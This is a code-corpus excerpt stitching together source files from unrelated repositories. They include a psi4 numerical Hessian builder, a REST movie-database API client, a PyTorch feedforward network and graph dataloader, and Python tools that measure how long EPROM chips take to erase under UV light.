fin_dif_2deriv[iat3+icor,:] = dis_grad
else:
fin_dif_2deriv[iat3+icor,:] -= dis_grad
fin_dif_2deriv[iat3+icor] *= 0.5/coor_disp
pc.pcprint("at %2s%2d ic %d pm %3.0f E = %24.14f DE = %24.14f"
% (at_label[iat],iat,
icor,pm, dis_e,del_e), file=en_sum)
pc.pcprint("at %2d ic %d pm %3.0f " % (iat,icor,pm), file=grad_sum)
for jat in range(num_at):
jat3 = 3*jat
pc.pcprint("at %2s%2d G: %14.6e %14.6e %14.6e DG: %14.6e %14.6e %14.6e "
% (at_label[jat],jat,
dis_grad[jat3], dis_grad[jat3+1], dis_grad[jat3+2],
del_grad[jat3], del_grad[jat3+1], del_grad[ jat3+2]),
file=grad_sum)
#print("at %2d ic %d " % (iat,icor),del_grad,file=grad_sum)
# en_sum.close()
# grad_sum.close()
pc.pcprint("\n\n================== Finished doing all atom displacements "
"==================")
psi4.core.print_out("\n\n================== Finished doing all atom "
"displacements ==================")
# do sort on en_array
sorted_en = np.argsort(en_array[:,0],) # ,axis=2)
en_mean = np.mean(en_array[1:,0])
en_std = np.std(en_array[1:,0])
gnorm_mean = 0.
# print("sorted_en -->\n",sorted_en)
pc.pcprint("",file=en_sum)
pc.pcprint("+-----------------------------------------------------------+",file=en_sum)
pc.pcprint("| Sorted energies for different atom displacements |",file=en_sum)
pc.pcprint("\n| coord_type = %6s disp = %7.3f |" %
(coord_type, coor_disp))
pc.pcprint("| First record should be for the reference geom |",file=en_sum)
pc.pcprint("+-----------------------------------------------------------+\n",file=en_sum)
pc.pcprint(f"\n+++ coor_disp = {coor_disp} disp_type = {run_type_op['coord_type']} coord_unit = {run_type_op['coord_unit']} \n", file=en_sum)
sord = 0
for sen in sorted_en:
sord += 1
gnorm = np.sqrt(np.dot(gr_array[sen,:],gr_array[sen,:]))
if sen == 0:
pc.pcprint(" found ref molecule - skip adding grad norm to total gnorm",file=en_sum)
pc.pcprint("sen = %d and sord = %d" % (sen,sord),file=en_sum)
else:
gnorm_mean += gnorm
pc.pcprint("%2d at %2s%2d xyz %d pm %2d DE = %18.14f E = %20.14f |grad| = %15.10f"
% (sord, at_label[dis_label[sen,0]],
dis_label[sen,0],dis_label[sen,1],dis_label[sen,2],
en_array[sen,0],en_array[sen,1],gnorm),file=en_sum)
# print("order = ",sord,dis_label[sen,0],dis_label[sen,1],dis_label[sen,2])
pc.pcprint("+-----------------------------------------------------------+",file=en_sum)
pc.pcprint("| en_mean = %12.9f en_std = %12.9f gnorm_mean = %12.9f" %
(en_mean,en_std,gnorm_mean/(6*num_at)),file=en_sum)
en_sum.close()
grad_sum.close()
# print_hess to check it looks OK
# ph.print_hess(fin_dif_2deriv,prnt=True)
hsf.print_hess(fin_dif_2deriv,prnt=True)
# symmetrize hessian
for iind in range(3*num_at):
for jjnd in range(iind):
ave_hess_ij = 0.5 * (fin_dif_2deriv[iind,jjnd] + fin_dif_2deriv[jjnd,iind])
pc.pcprint("\n iind,jjnd = %d,%d hess[ii,jj] = %15.9f hess[jj,ii] = %15.9f ave_hess = %15.9f"
% (iind,jjnd,fin_dif_2deriv[iind,jjnd],fin_dif_2deriv[jjnd,iind],ave_hess_ij))
fin_dif_2deriv[iind,jjnd] = ave_hess_ij
fin_dif_2deriv[jjnd,iind] = ave_hess_ij
calc_opt_freq = True
if calc_opt_freq:
# TODO: trying to write freq to different file - needs more work on print statements before doing this
# psi4.core.close_outfile()
# output_file += "_freq"
# psi4.core.set_output_file(output_file +'.out', False)
# psi4.core.print_out(f"\n This is the frequency calc continuation for {output_file[:5]}.out")
# (0) calc frequencies from psi4 hessian wfn
# set up and analyze traditional mass_wt hessian
# add in traditional ehess frequency analysis here
pc.pcprint("\n++++ (0) Traditional atomic mass weighted freq calc using numerical diff ehess ++++\n")
# second derivative matrix nphess -> from above file_wfn read
nphess = fin_dif_2deriv
# add in ehess_type for cart or mwt_hess
if coord_type == 'cart':
ehess_type = 'cart'
elif coord_type == 'masswt':
# for mwt_hess: ehess_type should == mhess_type
# originally had: ehess_type = 'mhess'
# probably should change this
ehess_type = 'mhess'
else:
pc.pcprint("***ERROR*** coord_type = %s and not valid"% coord_type)
sys.exit()
mwt_hess, umass, atmass_gmean, inv_hess, ret_freq_type, anal_freq, \
anal_evec = hsa.hess_setup_anal(
mol_name, at_label, npmass, file_geom, nphess,
tran_rot_v=None,
hess_type='ehess',
approx_type=None,
ehess_type=ehess_type,
mhess_type='atmwt',
inv_hess=False,
get_unproj_freq=True,
get_proj_freq=True,
anal_end_freq=True,
prnt_mol_info=False)
num_at = num_file_at
mol_geom = file_geom
units = file_mol.units()
# print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint('numerical frequencies - ret_freq_type = %s\n' % ret_freq_type)
pc.pcprint(str(anal_freq) + "\n")
pc.pcprint("\n ======= End of (0) %s frequencies from psi4 hess "
"wavefn========\n\n" % mol_name)
####################################################################
pc.pcprint("\n++++++++++++++++++++++ Molecular data for %s ++++++++++++++++++++++"
% mol_name)
pc.pcprint("\n====================================================================\n")
pc.pcprint("num_at in %s molecule = %d mol_geom.shape = %s" %
(mol_name, num_file_at,str(mol_geom.shape)))
pc.pcprint("\n=========================================================")
#print(" %s --- Units = %s" % (file_wfn.molecule().name(),
# file_wfn.molecule().units()))
pc.pcprint("\n %s --- Units = %s" % (mol_name, units))
pc.pcprint("\n x y z mass")
# included atom symbol (label) in print out
for iat in range(num_file_at):
pc.pcprint("\n%3d %2s %12.7f %12.7f %12.7f %12.7f" % (iat, at_label[iat],
mol_geom[iat, 0], mol_geom[iat, 1], mol_geom[iat, 2], npmass[iat]))
pc.pcprint("\n=========================================================")
psi4.core.close_outfile()
pc.prt_out_close = "close"
################################################################################
#
# Start of main routine of jdh_build_hess - for testing program
#
################################################################################
if __name__ == "__main__":
import argparse
import os
pc = Pcprint()
pc.pcprint("\n+-----------------------------------------------------------+")
pc.pcprint("\n| Start of main pgm to run/test jdh_build_hess.py |")
pc.pcprint("\n+-----------------------------------------------------------+\n")
# set up starting program
parser = argparse.ArgumentParser(
description="""
Program to build num jdh_hessian matrices using either cart or masswt coordinates.
\n 1) Use setup_psi4_npy_file to create appropriate wavefn.npy file for some molecule.
\n 2) Program checks for existence of both wavefn.npy and wavefn.json files.
\n 3) The psi4 wavefn files can be generated at the molecule's
starting or optimized equil geometry.
""")
parser.add_argument('-g','--geom',default='equil',
help = 'geom used to build hessian - options "equil" (def) or "init_pt"')
parser.add_argument('-d','--disp',type=float, default = 0.01,
help = 'num displacement in the finite differentiation (def 0.01)')
parser.add_argument('-c','--coord',default='cart',
help='coord type "cart" (def) or "masswt" used to form hessian')
parser.add_argument('-u','--coord_unit',default='angstrom',
help=' "angstrom" (def) or "bohr"')
parser.add_argument('npy_file',help='Name of wavefn file - BUT leave off .npy and .json extensions')
args = parser.parse_args()
pc.pcprint("\ntype for args: "+ str(type(args)))
pc.pcprint("\nargs" + str(args))
# get working directory and look for files with mol_name
work_dir = os.getcwd()
# check that npy_files npy_file.npy and npy_file.json exist
build_hess = args.npy_file[:-4] if args.npy_file[-4:] == '.npy' else args.npy_file
fjson = build_hess+'.json'
fnpy = build_hess +'.npy'
pc.pcprint(f"debug build_hess = {build_hess} fnpy = {fnpy} and fjson = {fjson}")
# read in jdh psi4 options dictionary from build_hess
# TODO: add test that fnpy and fjson exist
# TODO: add total energy and max force of current geometry to jopts
jopts = sav_psi4opt.json_wrt_rd_dict("read", build_hess, build_hess)
pc.pcprint("\njopts dictionary - type = "+str(type(jopts))+" -->: \n" + str(jopts))
# gather argparse options for type of hessian build - save options in run_type_op
run_type_op ={}
# mol_nm = args.mol_name
# mol_nm = "CH3NH2" # TODO: get mole name from wavefn or npy_file name
mol_nm = build_hess.split("_",1)[0]
run_type_op['mol_nm'] = mol_nm
pc.pcprint("molecule name = %s" % mol_nm)
# print out other parameters
pc.pcprint("\n working with %s %s geometry" % (args.geom, mol_nm))
disp = args.disp
# rescale disp if disp > 1.
if disp >= 1.:
disp /= 100.
pc.pcprint(f"args.goem = {args.disp} - disp reset to {disp}")
coord_type = args.coord
coord_unit = args.coord_unit
pc.pcprint('\n build hessian will displace atoms by %7f bohr using coord_type = %s' % (disp,coord_type))
# run_type_op = {'mol_nm':mol_nm, 'mol_geom': mol_geom, 'disp':disp,
run_type_op = {'mol_nm': mol_nm, 'mol_geom': args.geom, 'disp':disp, 'coord_type': args.coord,
'coord_unit': coord_unit, 'npy_file': build_hess}
pc.pcprint('\narg_parse parameters converted to the run_type_op dictionary \n'+ str(run_type_op))
# call jdh_build
jdh_build_num_hess(mol_nm, run_type_op, jopts, pc=pc)
#
pc.pcprint("\n+++++++ Finished test of jdh_build_num_hess +++++++\n")
``` |
{
"source": "johndiathens/CRUD-AppiClient",
"score": 3
} |
#### File: johndiathens/CRUD-AppiClient/classMovieDB.py
```python
import json
import requests
import urllib3
class MovieDB():
def __init__(self, BaseURL, username, password, proxie1s):
self.BaseURL = BaseURL
self.proxie1s = proxie1s
self.data = "username="+username+"&password="+password
temp1 = ((requests.post(BaseURL+"api/api-token-auth/", data=self.data, verify=False , proxies=self.proxie1s, headers={'Content-Type': "application/x-www-form-urlencoded"})).text)
temp2 = json.loads(temp1)
self.myToken = "Token" + " " + temp2['token']
self.headers = {}
# self.headers['Content-Type'] = "application/json" #unecessary if in requests i have json=data
self.headers['Authorization'] = self.myToken
print(self.headers)
def AppiClient(self, request_type, url, data=None):
try:
response = requests.request(request_type, url, json=data, verify=False, proxies=self.proxie1s, headers=self.headers)
return(response)
except:
print("Request can't be made.")
return None
def print_whole_category(self, table):
URL = self.BaseURL + 'api/' + table
string_print = ((self.AppiClient("GET", URL)).text).replace('},','\n')
string_print = string_print.replace('\n' , '}\n')
string_print = string_print.replace('[' , '')
string_print = string_print.replace(']' , '')
print(string_print)
def get_all(self):
print("Directors:")
self.print_whole_category('directors')
print("Actors:")
self.print_whole_category('actors')
print("Movies:")
self.print_whole_category('movies')
def get_director(self, id):
URL = self.BaseURL + 'api/directors/' + str(id)
print((self.AppiClient("GET", URL)).text)
def get_actor(self, id):
URL = self.BaseURL + 'api/actors/' + str(id)
print((self.AppiClient("GET", URL)).text)
def get_movie(self, id):
URL = self.BaseURL + 'api/movies/' + str(id)
print((self.AppiClient("GET", URL)).text)
def post_director(self, name_give, birthday_give):
payload = {'name' : name_give , 'birthday' : birthday_give}
URL = self.BaseURL + '/api/directors/'
print((self.AppiClient("POST", URL, payload)).text)
def post_actor(self, name_give, birthday_give):
payload = {'name' : name_give , 'birthday' : birthday_give}
URL = self.BaseURL + '/api/actors/'
print((self.AppiClient("POST", URL, payload)).text)
def post_movie(self, name_give, year, dir_id, act_list=None):
if self.director_exist(dir_id)==True:
flag=True
for i in act_list:
if self.actor_exist(i)==False:
print("Such actor doesn't exist.\n")
flag=False
break
if flag==True:
payload = {'name' : name_give, 'year' : year, 'director' : dir_id, 'actors' : act_list}
URL = self.BaseURL + '/api/movies/'
print((self.AppiClient("POST", URL, payload)).text)
else:
print("Such director doesn't exist.\n")
def delete_director(self, id):
URL = self.BaseURL + '/api/directors/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def delete_actor(self, id):
URL = self.BaseURL + '/api/actors/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def delete_movie(self, id):
URL = self.BaseURL + '/api/movies/' + str(id)
print((self.AppiClient("DELETE", URL)).text)
def director_exist(self, idtk):
req = self.AppiClient("GET", self.BaseURL + 'api/directors/' + str(idtk))
if (req).status_code==200:
return True
else:
return False
def actor_exist(self, idtk):
req = self.AppiClient("GET", self.BaseURL + 'api/actors/' + str(idtk))
if (req).status_code==200:
return True
else:
return False
def put_director(self , idtk , name_give , birthday_give):
payload = {"name" : name_give , "birthday" : birthday_give}
URL = self.BaseURL + '/api/directors/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
def put_actor(self , idtk , name_give , birthday_give):
payload = {"name" : name_give , "birthday" : birthday_give}
URL = self.BaseURL + '/api/actors/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
def put_movie(self , idtk , name_give , year, dir_id, act_list):
if self.director_exist(dir_id)==True:
flag=True
for i in act_list:
if self.actor_exist(i)==False:
print("Such actor doesn't exist.\n")
flag=False
break
if flag==True:
payload = {'name' : name_give, 'year' : year, 'director' : dir_id, 'actors' : act_list}
URL = self.BaseURL + '/api/movies/' + str(idtk) + '/'
print((self.AppiClient("PUT", URL , payload)).text)
else:
print("Such director doesn't exist.\n")
def patch_director(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/directors/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
def patch_actor(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/actors/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
def patch_movie(self, idtk, name_give):
payload = {"name" : name_give}
URL = self.BaseURL + '/api/movies/' + str(idtk) + '/'
print((self.AppiClient("PATCH", URL , payload)).text)
``` |
{
"source": "johnding1996/UMD-CMSC726-Project",
"score": 3
} |
#### File: johnding1996/UMD-CMSC726-Project/common.py
```python
from torch import nn
class FeedForwardNet(nn.Module):
def __init__(self, inp_dim, hidden_dim, outp_dim, n_layers, nonlinearity, dropout=0):
super().__init__()
layers = []
d_in = inp_dim
for i in range(n_layers):
module = nn.Linear(d_in, hidden_dim)
self.reset_parameters(module)
layers.append(module)
if dropout > 0:
layers.append(nn.Dropout(dropout))
if nonlinearity == 'relu':
nonlin = nn.ReLU(inplace=True)
elif nonlinearity == 'tanh':
nonlin = nn.Tanh()
elif nonlinearity == 'elu':
nonlin = nn.ELU(inplace=True)
elif nonlinearity != 'none':
raise NotImplementedError('only relu, tanh, and elu nonlinearities have been implemented')
if nonlinearity != 'none':
layers.append(nonlin)
d_in = hidden_dim
module = nn.Linear(d_in, outp_dim)
self.reset_parameters(module)
layers.append(module)
self.network = nn.Sequential(*layers)
def reset_parameters(self, module):
init_range = 0.07
module.weight.data.uniform_(-init_range, init_range)
module.bias.data.zero_()
def forward(self, x):
return self.network(x)
```
#### File: UMD-CMSC726-Project/data/dataloader.py
```python
import torch
import networkx as nx
import numpy as np
import random
import os
import time
from utils import *
class Graph_sequence_sampler_pytorch(torch.utils.data.Dataset):
def __init__(self, G_list, max_num_node=None, max_prev_node=None, iteration=20000):
self.adj_all = []
self.len_all = []
for G in G_list:
self.adj_all.append(np.asarray(nx.to_numpy_matrix(G)))
self.len_all.append(G.number_of_nodes())
if max_num_node is None:
self.n = max(self.len_all)
else:
self.n = max_num_node
if max_prev_node is None:
print('calculating max previous node, total iteration: {}'.format(iteration))
self.max_prev_node = max(self.calc_max_prev_node(iter=iteration))
print('max previous node: {}'.format(self.max_prev_node))
else:
self.max_prev_node = max_prev_node
# self.max_prev_node = max_prev_node
# # sort Graph in descending order
# len_batch_order = np.argsort(np.array(self.len_all))[::-1]
# self.len_all = [self.len_all[i] for i in len_batch_order]
# self.adj_all = [self.adj_all[i] for i in len_batch_order]
def __len__(self):
return len(self.adj_all)
def __getitem__(self, idx):
adj_copy = self.adj_all[idx].copy()
x_batch = np.zeros((self.n, self.max_prev_node)) # here zeros are padded for small graph
x_batch[0,:] = 1 # the first input token is all ones
y_batch = np.zeros((self.n, self.max_prev_node)) # here zeros are padded for small graph
# generate input x, y pairs
len_batch = adj_copy.shape[0]
x_idx = np.random.permutation(adj_copy.shape[0])
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
adj_copy_matrix = np.asmatrix(adj_copy)
G = nx.from_numpy_matrix(adj_copy_matrix)
# then do bfs in the permuted G
start_idx = np.random.randint(adj_copy.shape[0])
x_idx = np.array(bfs_seq(G, start_idx))
## convert G's adj matrix into a BFS-ordered graph's adj matrix
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
## truncate the matrix into n*M(max_prev_node)
adj_encoded = encode_adj(adj_copy.copy(), max_prev_node=self.max_prev_node)
# get x and y and adj
# for small graph the rest are zero padded
y_batch[0:adj_encoded.shape[0], :] = adj_encoded
x_batch[1:adj_encoded.shape[0] + 1, :] = adj_encoded
return {'x':x_batch,'y':y_batch, 'len':len_batch}
def calc_max_prev_node(self, iter=20000,topk=10):
max_prev_node = []
for i in range(iter):
if i % (iter / 5) == 0:
print('iter {} times'.format(i))
adj_idx = np.random.randint(len(self.adj_all))
adj_copy = self.adj_all[adj_idx].copy()
# print('Graph size', adj_copy.shape[0])
x_idx = np.random.permutation(adj_copy.shape[0])
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
adj_copy_matrix = np.asmatrix(adj_copy)
G = nx.from_numpy_matrix(adj_copy_matrix)
# then do bfs in the permuted G
start_idx = np.random.randint(adj_copy.shape[0])
x_idx = np.array(bfs_seq(G, start_idx))
adj_copy = adj_copy[np.ix_(x_idx, x_idx)]
# encode adj
adj_encoded = encode_adj_flexible(adj_copy.copy())
max_encoded_len = max([len(adj_encoded[i]) for i in range(len(adj_encoded))])
max_prev_node.append(max_encoded_len)
max_prev_node = sorted(max_prev_node)[-1*topk:]
return max_prev_node
``` |
{
"source": "JohnDMcMaster/eetime",
"score": 2
} |
#### File: JohnDMcMaster/eetime/bin_init.py
```python
import argparse
import eetime.jl
from eetime import util
import glob
import os
import binascii
import collect
def main():
parser = argparse.ArgumentParser(
description='Display and write the initial ROM read')
util.add_bool_arg(parser,
"--hexdump",
default=False,
help="Hexdump instead of writing")
parser.add_argument('jl', help='.jl to extract (or first file if dir)')
parser.add_argument('out',
nargs="?",
default="out.bin",
help='Output binary')
args = parser.parse_args()
fn = args.jl
if os.path.isdir(fn):
fn = sorted(list(glob.glob(fn + "/*.jl")))[0]
print("Opening %s" % (fn, ))
header, _footer, _reads = eetime.jl.load_jl(fn)
if not "read" in header:
raise Exception(".jl doesn't support initial read")
buf = collect.str2fw(header["read"])
if args.hexdump:
util.hexdump(buf, terse=True)
if __name__ == "__main__":
main()
```
#### File: JohnDMcMaster/eetime/check.py
```python
from eetime.minipro import Minipro
from eetime import util
import collect
def run(prog_dev, loop=False, verbose=False):
prog = Minipro(device=prog_dev, verbose=verbose)
def check():
read_buf = prog.read()["code"]
erased, erase_percent = collect.is_erased(read_buf,
prog_dev=prog.device)
print("is_erased %u w/ erase_percent % 8.3f%%" %
(erased, erase_percent))
if loop:
while True:
check()
else:
check()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='Write all bits to 0 of given device')
parser.add_argument('--device',
required=True,
help='minipro device. See "minipro -l"')
util.add_bool_arg(parser, "--verbose", default=False)
util.add_bool_arg(parser, "--loop", default=False, help="Check forever")
args = parser.parse_args()
run(args.device, loop=args.loop, verbose=args.verbose)
```
#### File: JohnDMcMaster/eetime/collect.py
```python
from eetime.util import tostr
from eetime import util
from eetime.minipro import Minipro
import json
import datetime
import time
import zlib
import binascii
import hashlib
import os
def popcount(x):
return bin(x).count("1")
def is_erased(fw, prog_dev):
# for now assume all 1's is erased
# on some devices like PIC this isn't true due to file 0 padding
set_bits = sum([popcount(x) for x in bytearray(fw)])
possible_bits = len(fw) * 8
percent = 100.0 * set_bits / possible_bits
return set_bits == possible_bits, percent
def hash8(buf):
"""Quick hash to visually indicator to user if data is still changing"""
return tostr(binascii.hexlify(hashlib.md5(buf).digest())[0:8])
def fw2str(fw):
return tostr(binascii.hexlify(zlib.compress(fw)))
def str2fw(s):
return zlib.decompress(binascii.unhexlify(s))
def tnow():
return datetime.datetime.utcnow().isoformat()
def check_erase(prog):
read_buf = prog.read()["code"]
erased, erase_percent = is_erased(read_buf, prog_dev=prog.device)
signature = hash8(read_buf)
print("is_erased %u w/ erase_percent % 8.3f%%, sig %s" %
(erased, erase_percent, signature))
def wait_erased(fout,
prog,
erased_threshold=20.,
interval=3.0,
prog_time=None,
passn=0,
need_passes=0,
timeout=None,
test=False,
verbose=False):
"""
erased_threshold: stop when this percent contiguous into a successful erase
Ex: if 99 iterations wasn't fully erased but 100+ was, stop at 120 iterations
interval: how often, in seconds, to read the device
"""
tstart = time.time()
# Last iteration timestamp. Used to "frame lock" reads at set interval
tlast = None
# Timestamp when EPROM was first half erased
dt_50 = None
dt_100 = None
iter = 0
nerased = 0
while True:
if tlast is not None:
while time.time() - tlast < interval:
time.sleep(0.1)
tlast = time.time()
dt_this = tlast - tstart
iter += 1
if timeout and dt_this >= timeout:
j = {
"type": "timeout",
'iter': iter,
'seconds': dt_this,
}
fout.write(json.dumps(j) + '\n')
fout.flush()
raise Exception("Timed out")
read_buf = prog.read()["code"]
erased, erase_percent = is_erased(read_buf, prog_dev=prog.device)
if erased or test:
nerased += 1
if not dt_100:
dt_100 = tlast - tstart
else:
nerased = 0
dt_100 = None
# Declare done when we've been erased for some percentage of elapsed time
complete_percent = 100.0 * nerased / iter
# Convert to more human friendly 100% scale
end_check = 100. * complete_percent / erased_threshold
j = {
"type": "read",
'iter': iter,
'seconds': dt_this,
'read': fw2str(read_buf),
'read_meta': "zlib",
'complete_percent': complete_percent,
'erase_percent': erase_percent,
'erased': erased
}
fout.write(json.dumps(j) + '\n')
fout.flush()
signature = hash8(read_buf)
print(
"pass %u / %u, iter % 3u @ %s: is_erased %u w/ erase_percent % 8.3f%%, sig %s, end_check: %0.1f%%"
% (
passn,
need_passes,
iter,
util.time_str_sec(dt_this),
erased,
erase_percent,
signature,
#
end_check))
if dt_50 is None and erase_percent >= 50 or test:
dt_50 = tlast - tstart
print("50%% erased after %0.1f sec" % (dt_50, ))
if end_check >= 100.0 or test:
break
dt_120 = tlast - tstart
print("Erased 100%% after %0.1f sec" % (dt_100, ))
print("Erased 120%% after %0.1f sec" % (dt_120, ))
j = {
"type": "footer",
"erase_time": dt_100,
"run_time": dt_120,
"half_erase_time": dt_50
}
if prog_time is not None:
j["prog_time"] = prog_time
fout.write(json.dumps(j) + '\n')
fout.flush()
return dt_100, dt_50
def run(dout,
prog_dev,
erased_threshold=20.,
interval=3.0,
passes=1,
read_init=True,
write_init=False,
eraser=None,
bulb=None,
user=None,
sn=None,
test=False,
timeout=None,
verbose=False):
if passes > 1 and not write_init:
raise Exception("Must --write-init if > 1 pass")
if not os.path.exists(dout):
os.makedirs(dout, exist_ok=True)
print("")
prog = Minipro(device=prog_dev, verbose=verbose)
print("Checking programmer...")
size = len(prog.read()["code"])
print("Device is %u bytes" % size)
# Write 0's at the beginning of every pass
init_buf = bytearray(size)
for passn in range(passes):
# 1 based indexing. At least make it match iter
passn += 1
fnout = '%s/iter_%02u.jl' % (dout, passn)
print('')
print('Writing to %s' % fnout)
read_init_buf = None
if read_init:
print('Reading initial state')
read_init_buf = prog.read()["code"]
if write_init:
print('Writing initial buffer...')
tstart = time.time()
prog.write(init_buf, verify=False)
prog_time = time.time() - tstart
print('Wrote in %0.1f sec' % prog_time)
else:
prog_time = None
with open(fnout, "w") as fout:
j = {
"type": "header",
"prog": "minipro",
"prog_dev": prog.device,
"datetime": tnow(),
"interval": interval,
"erased_threshold": erased_threshold,
}
if test:
j['test'] = bool(test)
if user:
j['user'] = user
if sn:
j['sn'] = sn
if eraser:
j['eraser'] = eraser
if bulb:
j['bulb'] = bulb
if read_init_buf:
j['read'] = fw2str(read_init_buf)
fout.write(json.dumps(j) + '\n')
fout.flush()
wait_erased(fout,
prog=prog,
erased_threshold=erased_threshold,
interval=interval,
prog_time=prog_time,
passn=passn,
need_passes=passes,
timeout=timeout,
test=test,
verbose=verbose)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description="Collect data on EPROM erasure time")
parser.add_argument('--device',
required=True,
help='minipro device. See "minipro -l"')
parser.add_argument(
'--passes',
type=int,
default=1,
help='Number of program-erase cycles. Requires --write-init')
parser.add_argument('--dir', default=None, help='Output directory')
parser.add_argument('--erased-threshold',
type=float,
default=20.,
help='Erase complete threshold (precent)')
parser.add_argument('--interval',
type=float,
default=3.0,
help='Erase check interval (seconds)')
parser.add_argument('--timeout',
type=float,
default=60 * 60,
help='Per pass timeout in seconds')
parser.add_argument('--eraser',
type=str,
default=None,
help='Eraser metadata')
parser.add_argument('--bulb', type=str, default=None, help='Bulb metadata')
parser.add_argument('--user',
type=str,
default="mcmaster",
help='Contributor metadata')
parser.add_argument('--sn', type=str, default=None, help='S/N metadata')
parser.add_argument(
'--postfix',
default=None,
help='Use default output dir, but add description postfix')
util.add_bool_arg(parser,
"--read-init",
default=True,
help="Read device at beginning")
util.add_bool_arg(parser,
"--write-init",
default=False,
help="Zero device at beginning. Only use on slow erases")
util.add_bool_arg(parser,
"--test",
default=False,
help="Run full software quickly")
util.add_bool_arg(parser, "--verbose", default=False)
args = parser.parse_args()
log_dir = args.dir
if log_dir is None:
postfix = args.postfix
# keep a descriptive default name
if postfix is None:
postfix = "sn-%s_bulb-%s" % (args.sn, args.bulb)
log_dir = util.default_date_dir("log", "", postfix)
timeout = args.timeout
if timeout < 1.0:
timeout = None
run(log_dir,
args.device,
passes=args.passes,
erased_threshold=args.erased_threshold,
interval=args.interval,
read_init=args.read_init,
write_init=args.write_init,
eraser=args.eraser,
bulb=args.bulb,
user=args.user,
sn=args.sn,
timeout=timeout,
test=args.test,
verbose=args.verbose)
```
#### File: JohnDMcMaster/eetime/csv_runs.py
```python
import argparse
stats = None
import os
import glob
def find_jl_dirs(root_dir):
if os.path.isdir(root_dir) and glob.glob(root_dir + "/*.jl"):
yield root_dir
# yield "prod/prod/2022-03-23_04_pe140t-2/2022-03-23_01_ee17/"
for f in os.listdir(root_dir):
d = os.path.join(root_dir, f)
# A subdir with .jl files?
if os.path.isdir(d):
for d2 in find_jl_dirs(d):
yield d2
def write_header(f):
l = "dir"
l += ",sn"
l += ",vendor,device"
l += ",prog,prog_dev"
l += ",eraser,bulb"
l += ",N"
l += ",t50_raw,t100_raw"
l += ",t50_norm,t100_norm"
f.write(l + "\n")
f.flush()
def write_row(f, d, vendor, device, statj):
h = statj["header"]
l = "%s" % d
l += ",%s" % (h["sn"])
l += ",%s,%s" % (vendor, device)
l += ",%s,%s" % (h["prog"], h["prog_dev"])
l += ",%s,%s" % (h["eraser"], h["bulb"])
l += ",%s" % (statj["n"])
l += ",%0.1f,%0.1f" % (statj["t50"], statj["t100"])
l += ",%0.1f,%0.1f" % (statj["t50_adj"], statj["t100_adj"])
f.write(l + "\n")
f.flush()
def load_sns(fn):
"sn to (vendor, model)"
# FIXME
ret = {}
f = open(fn, "r")
_header = f.readline()
for l in f:
l = l.strip()
sn, vendor, model = l.split(",")
ret[sn] = (vendor, model)
return ret
def normalize_txx(statj):
"""
Compute normalized erasure sensitivities
Baseline is:
-New USHIO G4T5 bulb
-Bulb to chip: based on PE-140T EPROM eraser
Chip at factory tray height
TODO: calculate distance from bulb
Bulb 2 vs 3
./stats.py prod/log_05_ee2x_bulbs/bulb2/2022-03-23_05_ee20/
t50: 145.4 sec
t100: 222.9 sec
./stats.py ./prod/log_05_ee2x_bulbs/bulb3/2022-03-24_03_ee20_bulb-3
t50: 129.5 sec
t100: 198.5 sec
ratios
t50: 0.89
t100: 0.89
./stats.py prod/log_05_ee2x_bulbs/bulb2/2022-03-23_01_ee21
t50: 137.0 sec
t100: 192.5 sec
./stats.py prod/log_05_ee2x_bulbs/bulb3/2022-03-24_05_ee21_bulb-3
t50: 125.3 sec
t100: 175.8 sec
ratios
t50: 0.91
t100: 0.91
"""
# TODO: move this to a JSON or something
bulb_scalars = {
# bulb 1 broke
# was used for early testing, ignore going forward
# FIXME
"1": 1.0,
# See lec_2022-03-24.txt
"2": 0.90,
"3": 1.00,
"4": 1.00,
}
assert "pe140t" in statj["header"]["eraser"]
bulb = statj["header"]["bulb"]
assert bulb in bulb_scalars, "Failed to find bulb %s" % bulb
scalar = bulb_scalars[bulb]
statj["t50_adj"] = statj["t50"] * scalar
statj["t100_adj"] = statj["t100"] * scalar
def run(root_dir, csv_fn, sns_fn=None, strict=True):
global stats
sns = load_sns(sns_fn)
f = open(csv_fn, "w")
write_header(f)
# takes a long time to import
if stats is None:
import stats
processed = 0
tries = 0
for d in find_jl_dirs(root_dir):
tries += 1
try:
statj = stats.run(d=d)
if statj["n"] == 0:
print("WARNING: skipping bad dir %s" % d)
if strict:
raise Exception("skipping bad dir %s" % d)
continue
sn = statj["header"]["sn"]
if sn not in sns:
print("WARNING: failed to find sn: %s" % sn)
if strict:
raise Exception("failed to find sn: %s" % sn)
vendor = ""
device = ""
else:
vendor, device = sns[sn]
normalize_txx(statj)
write_row(f, d, vendor, device, statj)
processed += 1
except Exception as e:
if strict:
raise
print(e)
print("")
print("")
print("")
f.close()
print("Wrote %u / %u entries to %s" % (processed, tries, csv_fn))
def main():
parser = argparse.ArgumentParser(
description="Generate a .csv w/ high level stats")
parser.add_argument('--sns', default="db/sns.csv", help='S/N .csv in')
parser.add_argument('root_dir',
default="db/prod",
nargs="?",
help='Directory to look around in')
parser.add_argument('csv',
default="db/runs.csv",
nargs="?",
help='.csv out')
args = parser.parse_args()
run(root_dir=args.root_dir, csv_fn=args.csv, sns_fn=args.sns)
if __name__ == "__main__":
main()
```
#### File: eetime/eetime/jl.py
```python
import json
import glob
import os
def load_jl(fn):
header = None
footer = None
reads = []
for l in open(fn, "r"):
j = json.loads(l)
if j["type"] == "header":
header = j
if "sn" in header:
header["sn"] = header["sn"].upper()
elif j["type"] == "footer":
footer = j
elif j["type"] == "read":
reads.append(j)
elif j["type"] == "timeout":
break
else:
assert 0, j["type"]
return header, footer, reads
def load_jls_arg(args, ignore_bad=True):
# accept multiple dirs or individual files
fns = []
for fn in args:
if os.path.isdir(fn):
fns += sorted(list(glob.glob(fn + "/*.jl")))
else:
fns += [fn]
for fn in sorted(fns):
header, footer, reads = load_jl(fn)
